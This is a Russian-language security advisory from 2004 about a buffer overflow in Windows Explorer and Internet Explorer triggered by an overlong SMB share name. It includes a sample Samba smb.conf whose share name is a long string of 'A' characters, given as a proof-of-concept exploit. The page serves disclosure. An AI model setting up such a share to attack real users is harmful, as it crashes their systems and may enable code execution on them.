Дата публикации: | 26.04.2004 |
Всего просмотров: | 2132 |
Опасность: | Критическая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Microsoft Internet Explorer, Microsoft Windows Explorer
Описание: Уязвимость обнаружена в Microsoft Windows Explorer и в Microsoft Internet Explorer. Удаленный пользователь, контролирующий общедоступный сетевой ресурс (network share), может аварийно завершить работу или выполнить произвольный код на системе целевого пользователя, подключившегося к сетевому ресурсу. Удаленный пользователь, контролирующий SMB шару, может установить специально обработанное значение имени шары, чтобы, когда целевой пользователь попытается подключиться к SMB шаре, аварийно завершить работу Microsoft Windows Explorer или Microsoft Internet Explorer или выполнить произвольный код. <> Согласно сообщению, Microsoft устранил эту уязвимость в Windows XP SP1 и Windows 2000 SP4 в начале 2002 года, как описано в Microsoft KB article 322857: http://support.microsoft.com/default.aspx?scid=kb;en-us;322857 Однако уязвимость до сих пор не устранена. Пример/Эксплоит: Windows не позволяет создавать длинные шары, однако ее можно создать через samba. Пример smb.conf: #------------ CUT HERE ------------- [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA] comment =3D Area 51 path =3D /tmp/testfolder public =3D yes writable =3D yes printable =3D no browseable =3D yes write list =3D @trymywingchung #------------ CUT HERE ------------- URL производителя:http://www.microsoft.com/technet/security/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Microsoft's Explorer and Internet Explorer long share name buffer overflow. |